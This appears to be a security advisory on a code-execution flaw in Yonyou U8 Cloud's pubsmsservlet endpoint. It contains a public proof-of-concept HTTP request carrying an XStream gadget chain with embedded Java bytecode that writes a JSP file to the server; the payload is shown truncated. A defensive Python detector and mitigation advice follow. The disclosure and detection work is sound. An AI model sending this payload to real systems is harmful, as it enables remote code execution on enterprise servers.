Yonyou U8 Cloud pubsmsservlet code execution vulnerability

Date: 2025-10-16 | Affected software: Yonyou U8 Cloud | PoC: public

Vulnerability description

Yonyou U8 Cloud is a cloud ERP suite built around the enterprise-internet model. It integrates human resources, financial accounting, logistics and inventory, customer relationship management and manufacturing, and is intended to give enterprises agile operations, lightweight management and simplified IT, backed by secure, compliant and reliable services. Yonyou U8 Cloud contains a command execution vulnerability: PubSmsServlet performs no effective type validation and no deserialization safety controls when it processes XML data, so an attacker can craft malicious XML that instantiates arbitrary objects and thereby gain control of the system. Affected versions: Yonyou U8 Cloud 2.0, 2.1, 2.3, 2.5, 2.6, 2.7, 2.65, 3.0, 3.1, 3.2, 3.5, 3.6, 3.6sp, 5.0, 5.0sp, 5.1, 5.1sp.

PoC code

POST /service/pubsmsservlet HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 5570
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15

<org.apache.commons.collections4.bag.TreeBag serialization="custom">
  <org.apache.commons.collections4.bag.TreeBag>
    <default/>
    <org.apache.commons.collections4.comparators.TransformingComparator>
      <decorated class="org.apache.commons.collections4.comparators.ComparableComparator"/>
      <transformer class="org.apache.commons.collections4.functors.ChainedTransformer">
        <iTransformers>
          <org.apache.commons.collections4.functors.ConstantTransformer>
            <iConstant class="java-class">com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</iConstant>
          </org.apache.commons.collections4.functors.ConstantTransformer>
          <org.apache.commons.collections4.functors.InstantiateTransformer>
            <iParamTypes>
              <java-class>javax.xml.transform.Templates</java-class>
            </iParamTypes>
            <iArgs>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                  <default>
                    <__name>xcodes</__name>
                    <__bytecodes>
                      <byte-array>yv66vgAAADQAcwoAHQAyBwAzCAA0CgA1ADYJADcAOAgAOQoAOgA7CAA8BwA9CgAJADIKAD4APwoACQBACgAJAEEKAAkAQgoAQwBECgBFAEYJADcARwoAPgBICABJCABKBwBLCgAVAEwHAE0KABcATgoAFwBPCgAXAEgKABUASAcAUAcAUQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwBSAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQANU3RhY2tNYXBUYWJsZQcAUwcAPQcAVAcAVQEACDxjbGluaXQ+BwBQAQAKU291cmNlRmlsZQEAFnB1YnNtc3NlcnZsZXRfZXhwLmphdmEMAB4AHwEAEXB1YnNtc3NlcnZsZXRfZXhwAQAYL3B1YnNtc3NlcnZsZXRfZXhwLmNsYXNzBwBWDABXAFgHAFkMAFoAWwEAR+mUmeivrzog5peg5rOV5LuOIGNsYXNzcGF0aCDkuK3mib7liLAgcHVic21zc2VydmxldF9leHAuY2xhc3Mg5paH5Lu244CCBwBcDABdAF4BAF/or7fnoa7kv50gcHVic21zc2VydmxldF9leHAuY2xhc3Mg5bey57yW6K+R77yM5bm25LiU5Zyo6L+Q6KGMIEpBUiDml7YgY2xhc3NwYXRoIOiuvue9ruato+ehruOAggEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwBTDABfAGAMAGEAYgwAYwAfDABkAGUHAGYMAGcAagcAawwAbABtDABuAFsMAG8AHwEAJEQ6XFU4Q0VSUFx3ZWJhcHBzXHU4Y193ZWJcZXJyb3IxLmpzcAECDTwlQCBwYWdlIGNvbnRlbnRUeXBlPSJ0ZXh0L2h0bWw7Y2hhcnNldD1nYjIzMTIiICU+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iemgtY24iPiA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1nYjIzMTIiPiA8dGl0bGU+TkM8L3RpdGxlPiA8L2hlYWQ+IDxib2R5PiA8ZGl2IGFsaWduPSJjZW50ZXIiPiDmirHmrYnvvIzlj5HnlJ/plJnor6/vvIFpZDogPCVvdXQucHJpbnRsbihqYXZhLnV0aWwuVVVJRC5yYW5kb21VVUlEKCkudG9TdHJpbmcoKSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiA8L2Rpdj4gPGRpdiBhbGlnbj0iY2VudGVyIj4gPGZvbnQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmQiIGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0Ij48L2ZvbnQ+PC
9kaXY+IDwvYm9keT4gPC9odG1sPgEAEmphdmEvaW8vRmlsZVdyaXRlcgwAHgBwAQATamF2YS9pby9QcmludFdyaXRlcgwAHgBxDAByAF4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAAJbQgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAA9qYXZhL2xhbmcvQ2xhc3MBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABBqYXZhL2xhbmcvU3lzdGVtAQADZXJyAQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARyZWFkAQAHKFtCSUkpSQEABXdyaXRlAQAHKFtCSUkpVgEABWZsdXNoAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAA291dAEABWNsb3NlAQAWKExqYXZhL2xhbmcvU3RyaW5nO1opVgEAEyhMamF2YS9pby9Xcml0ZXI7KVYBAAVwcmludAAhAAIAHQAAAAAABQABAB4AHwABACAAAAAdAAEAAQAAAAUqtwABsQAAAAEAIQAAAAYAAQAAAAwAAQAiACMAAgAgAAAAGQAAAAMAAAABsQAAAAEAIQAAAAYAAQAAACQAJAAAAAQAAQAlAAEAIgAmAAIAIAAAABkAAAAEAAAAAbEAAAABACEAAAAGAAEAAAApACQAAAAEAAEAJQAJACcAKAACACAAAADkAAQABwAAAGgSAhIDtgAETCvHABSyAAUSBrYAB7IABRIItgAHsbsACVm3AApNEQQAvAg6BCsZBAMZBL62AAtZPgKfAA4sGQQDHbYADKf/6Cy2AA0stgAOOgW4AA8ZBbYAEDoGsgARGQa2AAcrtgASsQAAAAIAIQAAAD4ADwAAAC0ACAAvAAwAMAAUADEAHAAyAB0ANgAlADgALAA5ADwAOgBHADwASwA9AFEAQABbAEEAYwBCAGcAQwApAAAAJgAD/AAdBwAq/gAOBwArAAcALP8AGgAFBwAtBwAqBwArAQcALAAAACQAAAAEAAEAHAAIAC4AHwABACAAAAB8AAQABAAAACsSE0sSFEy7ABVZKgO3ABZNuwAXWSy3ABhOLSu2ABkttgAaLLYAG6cABEuxAAEAAAAmACkAHAACACEAAAAqAAoAAAARAAMAEgAGABQAEAAVABkAFgAeABcAIgAYACYAHQApABoAKgAeACkAAAAHAAJpBwAvAAACADAAAAACADEAaQAAAAoAAQBFAEMAaAAJ</byte-array>
                    </__bytecodes>
      ...[truncated]
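The root cause described above is unmarshalling attacker-controlled XML without a type allowlist: the PoC's outer element and class="..." attributes name Commons Collections comparator and transformer classes plus TemplatesImpl, which is the classic XStream-style gadget chain. The following detector is an added example written for this page; it is not code from Yonyou or from the PoC author. It collects every dotted Java class name an XStream-style parser would try to resolve from the request body, compares them against an allowlist, and also flags the serialization="custom" marker and the embedded __bytecodes field seen in the PoC. The ALLOWED_CLASSES set is a hypothetical placeholder, since the page does not state which message types the servlet legitimately accepts, and both sample bodies are constructed for the test (the gadget sample carries a placeholder instead of real bytecode).

```python
"""Allowlist-based inspection of XML bodies sent to /service/pubsmsservlet (added example)."""
import re
import xml.etree.ElementTree as ET  # assumption: defusedxml is not installed; prefer it on untrusted input

# A dotted, fully qualified Java class name. Single-word XStream aliases such as
# <map>, <string>, <java-class> or <byte-array> deliberately do not match.
JAVA_CLASS_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+$")

# Classes that make up the gadget chain in the public PoC above.
GADGET_CLASSES = frozenset({
    "org.apache.commons.collections4.bag.TreeBag",
    "org.apache.commons.collections4.comparators.TransformingComparator",
    "org.apache.commons.collections4.functors.ChainedTransformer",
    "org.apache.commons.collections4.functors.ConstantTransformer",
    "org.apache.commons.collections4.functors.InstantiateTransformer",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter",
})

# Hypothetical allowlist (placeholder): the only types the SMS servlet should ever
# need to unmarshal. The real U8 Cloud message types are not given on the page.
ALLOWED_CLASSES = frozenset({
    "java.lang.String",
    "java.util.HashMap",
    "java.util.ArrayList",
})


def extract_class_refs(xml_body: str) -> set[str]:
    """Return every dotted class name referenced as an element tag or class="..." attribute."""
    root = ET.fromstring(xml_body)
    refs: set[str] = set()
    for elem in root.iter():
        for candidate in (elem.tag, elem.get("class")):
            if candidate and JAVA_CLASS_RE.match(candidate):
                refs.add(candidate)
    return refs


def assess_request(path: str, body: str, allowlist: frozenset[str] = ALLOWED_CLASSES) -> dict:
    """Decide whether an inbound XML body should be rejected before it reaches the unmarshaller.

    Rejection reasons: malformed XML, a known gadget class, any class outside the
    allowlist, the serialization="custom" marker, or an embedded __bytecodes field.
    """
    result = {"path": path, "block": False, "reasons": [], "class_refs": []}
    try:
        refs = extract_class_refs(body)
    except ET.ParseError as exc:
        result["reasons"].append(f"malformed XML: {exc}")
        result["block"] = True
        return result
    result["class_refs"] = sorted(refs)

    gadget_hits = refs & GADGET_CLASSES
    if gadget_hits:
        result["reasons"].append("known gadget class: " + ", ".join(sorted(gadget_hits)))
    unexpected = refs - allowlist - GADGET_CLASSES
    if unexpected:
        result["reasons"].append("class outside allowlist: " + ", ".join(sorted(unexpected)))
    if 'serialization="custom"' in body:
        result["reasons"].append('serialization="custom" marker present')
    if "<__bytecodes>" in body:
        result["reasons"].append("embedded __bytecodes (TemplatesImpl bytecode) present")
    result["block"] = bool(result["reasons"])
    return result


# Constructed benign body: an ordinary XStream map using only built-in aliases.
BENIGN_BODY = (
    "<map><entry><string>mobile</string><string>13800000000</string></entry>"
    "<entry><string>content</string><string>order 42 shipped</string></entry></map>"
)

# Constructed sample mirroring the outer structure of the PoC above; the bytecode
# is replaced by a placeholder so the sample only serves to exercise the detector.
GADGET_BODY = (
    '<org.apache.commons.collections4.bag.TreeBag serialization="custom">'
    "<org.apache.commons.collections4.bag.TreeBag><default/>"
    "<org.apache.commons.collections4.comparators.TransformingComparator>"
    '<decorated class="org.apache.commons.collections4.comparators.ComparableComparator"/>'
    '<transformer class="org.apache.commons.collections4.functors.ChainedTransformer"/>'
    "</org.apache.commons.collections4.comparators.TransformingComparator>"
    "<__bytecodes><byte-array>PLACEHOLDER</byte-array></__bytecodes>"
    "</org.apache.commons.collections4.bag.TreeBag>"
    "</org.apache.commons.collections4.bag.TreeBag>"
)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("gadget", GADGET_BODY)):
        verdict = assess_request("/service/pubsmsservlet", body)
        print(label, "BLOCK" if verdict["block"] else "allow", verdict["reasons"])
```

This check belongs at a WAF or servlet filter in front of the endpoint and is a stop-gap, not the fix: the durable mitigation is to configure the unmarshaller itself with an explicit type allowlist (for XStream, denying everything with NoTypePermission.NONE and then calling allowTypes for the handful of expected classes) and to upgrade to a patched U8 Cloud release. The detector rejects anything it cannot parse, because a body the inspector cannot read is exactly the body the application parser must not be allowed to interpret differently.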
